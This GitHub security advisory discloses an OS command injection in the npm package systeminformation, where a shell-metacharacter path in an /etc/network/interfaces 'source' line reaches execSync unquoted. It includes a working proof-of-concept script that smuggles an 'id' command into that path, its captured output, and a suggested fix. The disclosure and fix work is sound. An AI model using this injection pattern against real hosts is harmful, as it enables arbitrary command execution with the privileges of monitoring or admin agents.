GHSA-5XPP-75JX-M839

Vulnerability from github – Published: 2026-07-15 23:09 – Updated: 2026-07-15 23:09
VLAI
Summary
systeminformation: OS command injection in networkInterfaces() via interfaces(5) source-directive path on Linux
Details

Summary

On Linux, systeminformation's networkInterfaces() is vulnerable to OS command injection through the Debian/Ubuntu interfaces(5) source directive. While collecting per-interface DHCP state, the library reads /etc/network/interfaces and, for every source <path> line it encounters, extracts the path token from the file content and interpolates it unquoted into a shell command string that is run via execSync(). A source line whose path contains shell metacharacters executes arbitrary commands with the privileges of the calling Node.js process.

This is the same root-cause class as the previously-fixed NetworkManager-connection-name injection in this file: a value parsed out of local system state is re-interpolated into a shell command string without sanitization. The NetworkManager paths were converted to argument-array execution, but the interfaces(5) source-recursion sink in checkLinuxDCHPInterfaces() was left unfixed and still builds a shell string. The input to this sink is unsanitized (unlike the iface/connectionName paths, which pass through util.sanitizeString in strict mode before reaching their commands).

Impact

An attacker who can place or influence a sourced path in /etc/network/interfaces (or any file it transitively sources) achieves command execution inside any process that calls networkInterfaces(). Realistic affected deployments are the same ones that motivate this library:

  • local inventory / asset agents
  • monitoring and diagnostics agents
  • admin-dashboard backends collecting host information
  • device-management / desktop agents

If such a process runs with elevated privileges, the injected command runs with those privileges. networkInterfaces() is a core, frequently-called API and is reached transitively by getStaticData() / getAllData(), so the sink is exercised by ordinary usage on Linux.

Threat model

The dangerous value is not a function argument supplied by the caller. It is read from the content of an interfaces(5) configuration file. The stock Debian/Ubuntu layout uses source /etc/network/interfaces.d/* and source-directory fan-out, so the parser routinely follows source directives into other files and re-parses their source lines. Any actor who can write a file that becomes reachable through that source chain — for example a lower-privileged process or configuration-management hook that drops a file into a sourced directory, or a tool that materializes an interfaces snippet from semi-trusted input — controls the path token that lands in the shell command. No NetworkManager activation or special hardware is required; the only precondition is that one sourced path string contains shell metacharacters.

Vulnerable code

lib/network.js, checkLinuxDCHPInterfaces() (current 5.31.6 line numbers):

// lib/network.js
function checkLinuxDCHPInterfaces(file) {
  let result = [];
  try {
    const cmd = `cat ${file} 2> /dev/null | grep 'iface\\|source'`;   // <-- unquoted ${file} -> shell sink
    const lines = execSync(cmd, util.execOptsLinux).toString().split('\n');

    lines.forEach((line) => {
      const parts = line.replace(/\s+/g, ' ').trim().split(' ');
      if (parts.length >= 4) {
        if (line.toLowerCase().indexOf(' inet ') >= 0 && line.toLowerCase().indexOf('dhcp') >= 0) {
          result.push(parts[1]);
        }
      }
      if (line.toLowerCase().includes('source')) {
        const file = line.split(' ')[1];                              // <-- path parsed FROM file content
        result = result.concat(checkLinuxDCHPInterfaces(file));        // <-- recurses, re-feeding attacker path
      }
    });
  } catch {
    util.noop();
  }
  return result;
}

util.execOptsLinux sets no shell option, so execSync(cmd, util.execOptsLinux) runs cmd through /bin/sh. The ${file} token is interpolated raw — not quoted, not passed through util.sanitizeString/sanitizeShellString — so ;, $( ), backticks, |, &, redirections, and even a bare space all break out of the intended cat/grep pipeline.

Reach chain to the public API:

// lib/network.js, getLinuxDHCPNics()
result = checkLinuxDCHPInterfaces('/etc/network/interfaces');
// lib/network.js, networkInterfaces() (Linux branch)
_dhcpNics = getLinuxDHCPNics();

networkInterfaces() is also reached by getStaticData() and getAllData() in lib/index.js.

Reproduction

The PoC exercises the verbatim shipped sink function extracted from the installed node_modules/systeminformation/lib/network.js (version pinned to 5.31.6), bound to the same child_process.execSync and shipped util.execOptsLinux the library uses. It then drives the exact source-recursion data flow with a malicious sourced path. A negative control with a benign path confirms no execution occurs on well-formed input.

Install the pinned vulnerable version:

mkdir si-poc && cd si-poc
npm init -y >/dev/null
npm install systeminformation@5.31.6

poc.js:

const fs = require('fs');
const path = require('path');
const cp = require('child_process');
const libDir = path.join(__dirname, 'node_modules', 'systeminformation', 'lib');
const util = require(path.join(libDir, 'util.js'));

// Load the VERBATIM shipped sink function from the installed library source.
const src = fs.readFileSync(path.join(libDir, 'network.js'), 'utf8');
const m = src.match(/function checkLinuxDCHPInterfaces\(file\) \{[\s\S]*?\n\}\n/);
if (!m) { console.error('could not locate shipped function'); process.exit(2); }

// Bind the same free vars network.js binds: execSync + util.
const execSync = cp.execSync;
const checkLinuxDCHPInterfaces =
  new Function('execSync', 'util', m[0] + '\nreturn checkLinuxDCHPInterfaces;')(execSync, util);

// --- Malicious case: a sourced interfaces file with shell metacharacters in the path ---
const tmp = fs.mkdtempSync('/tmp/si-dhcp-');
const outer = path.join(tmp, 'interfaces');
const marker = path.join(tmp, 'PWNED');
const maliciousSource = `/dev/null;id>${marker};echo`;
fs.writeFileSync(outer, `auto lo\niface lo inet loopback\nsource ${maliciousSource}\n`);

console.log('PRE  marker_exists=' + fs.existsSync(marker));
const res = checkLinuxDCHPInterfaces(outer);   // == networkInterfaces() -> getLinuxDHCPNics() path
console.log('returned=' + JSON.stringify(res));
console.log('POST marker_exists=' + fs.existsSync(marker));
if (fs.existsSync(marker)) console.log('marker_contents=' + fs.readFileSync(marker, 'utf8').trim());

// --- Negative control: a benign sourced path must NOT execute anything ---
const tmp2 = fs.mkdtempSync('/tmp/si-neg-');
const outer2 = path.join(tmp2, 'interfaces');
const inner2 = path.join(tmp2, 'iface.d');
const marker2 = path.join(tmp2, 'PWNED_NEG');
fs.writeFileSync(inner2, 'iface eth0 inet dhcp\n');
fs.writeFileSync(outer2, `auto lo\nsource ${inner2}\n`);
console.log('\nNEG pre  marker_exists=' + fs.existsSync(marker2));
const res2 = checkLinuxDCHPInterfaces(outer2);
console.log('NEG returned=' + JSON.stringify(res2));
console.log('NEG post marker_exists=' + fs.existsSync(marker2));

Run it:

node poc.js

Verbatim captured output (against systeminformation@5.31.6):

PRE  marker_exists=false
returned=[]
POST marker_exists=true
marker_contents=uid=501(rick) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)

NEG pre  marker_exists=false
NEG returned=["eth0"]
NEG post marker_exists=false

The malicious source path caused the injected id command to run (marker created, contents = the calling process identity), while the benign source path parsed normally (["eth0"]) and produced no marker. The injected command runs with the privileges of the Node.js process that called networkInterfaces().

End-to-end reproduction

The transcript above is the end-to-end run against the pinned published artifact systeminformation@5.31.6, loading the shipped lib/network.js and lib/util.js from node_modules. Exact commands:

mkdir si-poc && cd si-poc
npm init -y >/dev/null
npm install systeminformation@5.31.6
# place poc.js (from the Reproduction section) in this directory
node poc.js

The marker file PWNED is created only by the injected command path; the negative-control marker PWNED_NEG is never created. The verbatim captured stdout is shown in the Reproduction section above.

Suggested fix

Stop building a shell string from a path that comes out of file content. Read the file with fs (no shell), or use argument-array execution, and never interpolate a parsed source path into a shell command. For example:

function checkLinuxDCHPInterfaces(file) {
  let result = [];
  try {
    // No shell: read the file directly and filter in JS.
    const content = require('fs').readFileSync(file, { encoding: 'utf8' });
    const lines = content.split('\n').filter((l) => /iface|source/.test(l));
    lines.forEach((line) => {
      const parts = line.replace(/\s+/g, ' ').trim().split(' ');
      if (parts.length >= 4 &&
          line.toLowerCase().indexOf(' inet ') >= 0 &&
          line.toLowerCase().indexOf('dhcp') >= 0) {
        result.push(parts[1]);
      }
      if (line.toLowerCase().includes('source')) {
        const sourced = line.split(' ')[1];
        result = result.concat(checkLinuxDCHPInterfaces(sourced));
      }
    });
  } catch {
    require('./util').noop();
  }
  return result;
}

If shelling out is preferred, replace the cat/grep shell string with argument-array execution as shown below, so the path is passed as a single argv element and the shell never re-parses it:

const { execFileSync } = require('child_process');
const content = execFileSync('cat', [file], util.execOptsLinux).toString();

Quoting alone is insufficient. Treat every value parsed from interfaces(5) files as untrusted even though it originates from local system state, consistent with the defensive util.sanitizeString pattern already applied to the interface name and NetworkManager connection name on the sibling paths.

Fix PR

A fix is provided on a private temporary fork (not pushed to any public fork during the embargo). The branch replaces the cat ${file} shell string in checkLinuxDCHPInterfaces() with a non-shell fs.readFileSync read and adds a Linux regression test that points the function at an interfaces file containing a source directive with shell metacharacters and asserts that no side-effect command runs (no marker file is produced) while a benign sourced DHCP interface is still parsed.

Credit

Reported by tonghuaroot.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.31.6"
      },
      "package": {
        "ecosystem": "npm",
        "name": "systeminformation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.31.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50289"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-15T23:09:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nOn Linux, `systeminformation`\u0027s `networkInterfaces()` is vulnerable to OS command injection through the Debian/Ubuntu `interfaces(5)` `source` directive. While collecting per-interface DHCP state, the library reads `/etc/network/interfaces` and, for every `source \u003cpath\u003e` line it encounters, extracts the path token *from the file content* and interpolates it **unquoted** into a shell command string that is run via `execSync()`. A `source` line whose path contains shell metacharacters executes arbitrary commands with the privileges of the calling Node.js process.\n\nThis is the same root-cause class as the previously-fixed NetworkManager-connection-name injection in this file: a value parsed out of local system state is re-interpolated into a shell command string without sanitization. The NetworkManager paths were converted to argument-array execution, but the `interfaces(5)` `source`-recursion sink in `checkLinuxDCHPInterfaces()` was left unfixed and still builds a shell string. The input to this sink is *unsanitized* (unlike the `iface`/`connectionName` paths, which pass through `util.sanitizeString` in strict mode before reaching their commands).\n\n### Impact\n\nAn attacker who can place or influence a `source`d path in `/etc/network/interfaces` (or any file it transitively `source`s) achieves command execution inside any process that calls `networkInterfaces()`. Realistic affected deployments are the same ones that motivate this library:\n\n- local inventory / asset agents\n- monitoring and diagnostics agents\n- admin-dashboard backends collecting host information\n- device-management / desktop agents\n\nIf such a process runs with elevated privileges, the injected command runs with those privileges. `networkInterfaces()` is a core, frequently-called API and is reached transitively by `getStaticData()` / `getAllData()`, so the sink is exercised by ordinary usage on Linux.\n\n### Threat model\n\nThe dangerous value is **not** a function argument supplied by the caller. It is read from the *content* of an `interfaces(5)` configuration file. The stock Debian/Ubuntu layout uses `source /etc/network/interfaces.d/*` and `source-directory` fan-out, so the parser routinely follows `source` directives into other files and re-parses their `source` lines. Any actor who can write a file that becomes reachable through that `source` chain \u2014 for example a lower-privileged process or configuration-management hook that drops a file into a `source`d directory, or a tool that materializes an interfaces snippet from semi-trusted input \u2014 controls the path token that lands in the shell command. No NetworkManager activation or special hardware is required; the only precondition is that one `source`d path string contains shell metacharacters.\n\n### Vulnerable code\n\n`lib/network.js`, `checkLinuxDCHPInterfaces()` (current `5.31.6` line numbers):\n\n```js\n// lib/network.js\nfunction checkLinuxDCHPInterfaces(file) {\n  let result = [];\n  try {\n    const cmd = `cat ${file} 2\u003e /dev/null | grep \u0027iface\\\\|source\u0027`;   // \u003c-- unquoted ${file} -\u003e shell sink\n    const lines = execSync(cmd, util.execOptsLinux).toString().split(\u0027\\n\u0027);\n\n    lines.forEach((line) =\u003e {\n      const parts = line.replace(/\\s+/g, \u0027 \u0027).trim().split(\u0027 \u0027);\n      if (parts.length \u003e= 4) {\n        if (line.toLowerCase().indexOf(\u0027 inet \u0027) \u003e= 0 \u0026\u0026 line.toLowerCase().indexOf(\u0027dhcp\u0027) \u003e= 0) {\n          result.push(parts[1]);\n        }\n      }\n      if (line.toLowerCase().includes(\u0027source\u0027)) {\n        const file = line.split(\u0027 \u0027)[1];                              // \u003c-- path parsed FROM file content\n        result = result.concat(checkLinuxDCHPInterfaces(file));        // \u003c-- recurses, re-feeding attacker path\n      }\n    });\n  } catch {\n    util.noop();\n  }\n  return result;\n}\n```\n\n`util.execOptsLinux` sets no `shell` option, so `execSync(cmd, util.execOptsLinux)` runs `cmd` through `/bin/sh`. The `${file}` token is interpolated raw \u2014 not quoted, not passed through `util.sanitizeString`/`sanitizeShellString` \u2014 so `;`, `$( )`, backticks, `|`, `\u0026`, redirections, and even a bare space all break out of the intended `cat`/`grep` pipeline.\n\nReach chain to the public API:\n\n```js\n// lib/network.js, getLinuxDHCPNics()\nresult = checkLinuxDCHPInterfaces(\u0027/etc/network/interfaces\u0027);\n```\n\n```js\n// lib/network.js, networkInterfaces() (Linux branch)\n_dhcpNics = getLinuxDHCPNics();\n```\n\n`networkInterfaces()` is also reached by `getStaticData()` and `getAllData()` in `lib/index.js`.\n\n### Reproduction\n\nThe PoC exercises the **verbatim shipped sink function** extracted from the installed `node_modules/systeminformation/lib/network.js` (version pinned to `5.31.6`), bound to the same `child_process.execSync` and shipped `util.execOptsLinux` the library uses. It then drives the exact `source`-recursion data flow with a malicious sourced path. A negative control with a benign path confirms no execution occurs on well-formed input.\n\nInstall the pinned vulnerable version:\n\n```bash\nmkdir si-poc \u0026\u0026 cd si-poc\nnpm init -y \u003e/dev/null\nnpm install systeminformation@5.31.6\n```\n\n`poc.js`:\n\n```js\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\nconst cp = require(\u0027child_process\u0027);\nconst libDir = path.join(__dirname, \u0027node_modules\u0027, \u0027systeminformation\u0027, \u0027lib\u0027);\nconst util = require(path.join(libDir, \u0027util.js\u0027));\n\n// Load the VERBATIM shipped sink function from the installed library source.\nconst src = fs.readFileSync(path.join(libDir, \u0027network.js\u0027), \u0027utf8\u0027);\nconst m = src.match(/function checkLinuxDCHPInterfaces\\(file\\) \\{[\\s\\S]*?\\n\\}\\n/);\nif (!m) { console.error(\u0027could not locate shipped function\u0027); process.exit(2); }\n\n// Bind the same free vars network.js binds: execSync + util.\nconst execSync = cp.execSync;\nconst checkLinuxDCHPInterfaces =\n  new Function(\u0027execSync\u0027, \u0027util\u0027, m[0] + \u0027\\nreturn checkLinuxDCHPInterfaces;\u0027)(execSync, util);\n\n// --- Malicious case: a sourced interfaces file with shell metacharacters in the path ---\nconst tmp = fs.mkdtempSync(\u0027/tmp/si-dhcp-\u0027);\nconst outer = path.join(tmp, \u0027interfaces\u0027);\nconst marker = path.join(tmp, \u0027PWNED\u0027);\nconst maliciousSource = `/dev/null;id\u003e${marker};echo`;\nfs.writeFileSync(outer, `auto lo\\niface lo inet loopback\\nsource ${maliciousSource}\\n`);\n\nconsole.log(\u0027PRE  marker_exists=\u0027 + fs.existsSync(marker));\nconst res = checkLinuxDCHPInterfaces(outer);   // == networkInterfaces() -\u003e getLinuxDHCPNics() path\nconsole.log(\u0027returned=\u0027 + JSON.stringify(res));\nconsole.log(\u0027POST marker_exists=\u0027 + fs.existsSync(marker));\nif (fs.existsSync(marker)) console.log(\u0027marker_contents=\u0027 + fs.readFileSync(marker, \u0027utf8\u0027).trim());\n\n// --- Negative control: a benign sourced path must NOT execute anything ---\nconst tmp2 = fs.mkdtempSync(\u0027/tmp/si-neg-\u0027);\nconst outer2 = path.join(tmp2, \u0027interfaces\u0027);\nconst inner2 = path.join(tmp2, \u0027iface.d\u0027);\nconst marker2 = path.join(tmp2, \u0027PWNED_NEG\u0027);\nfs.writeFileSync(inner2, \u0027iface eth0 inet dhcp\\n\u0027);\nfs.writeFileSync(outer2, `auto lo\\nsource ${inner2}\\n`);\nconsole.log(\u0027\\nNEG pre  marker_exists=\u0027 + fs.existsSync(marker2));\nconst res2 = checkLinuxDCHPInterfaces(outer2);\nconsole.log(\u0027NEG returned=\u0027 + JSON.stringify(res2));\nconsole.log(\u0027NEG post marker_exists=\u0027 + fs.existsSync(marker2));\n```\n\nRun it:\n\n```bash\nnode poc.js\n```\n\nVerbatim captured output (against `systeminformation@5.31.6`):\n\n```\nPRE  marker_exists=false\nreturned=[]\nPOST marker_exists=true\nmarker_contents=uid=501(rick) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)\n\nNEG pre  marker_exists=false\nNEG returned=[\"eth0\"]\nNEG post marker_exists=false\n```\n\nThe malicious `source` path caused the injected `id` command to run (marker created, contents = the calling process identity), while the benign `source` path parsed normally (`[\"eth0\"]`) and produced no marker. The injected command runs with the privileges of the Node.js process that called `networkInterfaces()`.\n\n### End-to-end reproduction\n\nThe transcript above is the end-to-end run against the pinned published artifact `systeminformation@5.31.6`, loading the shipped `lib/network.js` and `lib/util.js` from `node_modules`. Exact commands:\n\n```bash\nmkdir si-poc \u0026\u0026 cd si-poc\nnpm init -y \u003e/dev/null\nnpm install systeminformation@5.31.6\n# place poc.js (from the Reproduction section) in this directory\nnode poc.js\n```\n\nThe marker file `PWNED` is created only by the injected command path; the negative-control marker `PWNED_NEG` is never created. The verbatim captured stdout is shown in the Reproduction section above.\n\n### Suggested fix\n\nStop building a shell string from a path that comes out of file content. Read the file with `fs` (no shell), or use argument-array execution, and never interpolate a parsed `source` path into a shell command. For example:\n\n```js\nfunction checkLinuxDCHPInterfaces(file) {\n  let result = [];\n  try {\n    // No shell: read the file directly and filter in JS.\n    const content = require(\u0027fs\u0027).readFileSync(file, { encoding: \u0027utf8\u0027 });\n    const lines = content.split(\u0027\\n\u0027).filter((l) =\u003e /iface|source/.test(l));\n    lines.forEach((line) =\u003e {\n      const parts = line.replace(/\\s+/g, \u0027 \u0027).trim().split(\u0027 \u0027);\n      if (parts.length \u003e= 4 \u0026\u0026\n          line.toLowerCase().indexOf(\u0027 inet \u0027) \u003e= 0 \u0026\u0026\n          line.toLowerCase().indexOf(\u0027dhcp\u0027) \u003e= 0) {\n        result.push(parts[1]);\n      }\n      if (line.toLowerCase().includes(\u0027source\u0027)) {\n        const sourced = line.split(\u0027 \u0027)[1];\n        result = result.concat(checkLinuxDCHPInterfaces(sourced));\n      }\n    });\n  } catch {\n    require(\u0027./util\u0027).noop();\n  }\n  return result;\n}\n```\n\nIf shelling out is preferred, replace the `cat`/`grep` shell string with argument-array execution as shown below, so the path is passed as a single argv element and the shell never re-parses it:\n\n```js\nconst { execFileSync } = require(\u0027child_process\u0027);\nconst content = execFileSync(\u0027cat\u0027, [file], util.execOptsLinux).toString();\n```\n\nQuoting alone is insufficient. Treat every value parsed from `interfaces(5)` files as untrusted even though it originates from local system state, consistent with the defensive `util.sanitizeString` pattern already applied to the interface name and NetworkManager connection name on the sibling paths.\n\n### Fix PR\n\nA fix is provided on a private temporary fork (not pushed to any public fork during the embargo). The branch replaces the `cat ${file}` shell string in `checkLinuxDCHPInterfaces()` with a non-shell `fs.readFileSync` read and adds a Linux regression test that points the function at an `interfaces` file containing a `source` directive with shell metacharacters and asserts that no side-effect command runs (no marker file is produced) while a benign sourced DHCP interface is still parsed.\n\n### Credit\n\nReported by tonghuaroot.",
  "id": "GHSA-5xpp-75jx-m839",
  "modified": "2026-07-15T23:09:28Z",
  "published": "2026-07-15T23:09:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-5xpp-75jx-m839"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/commit/bbfddde48672d0ee124fefdb3cb4442fd9dd4f03"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sebhildebrandt/systeminformation"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/releases/tag/v5.31.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "systeminformation: OS command injection in networkInterfaces() via interfaces(5) source-directive path on Linux"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…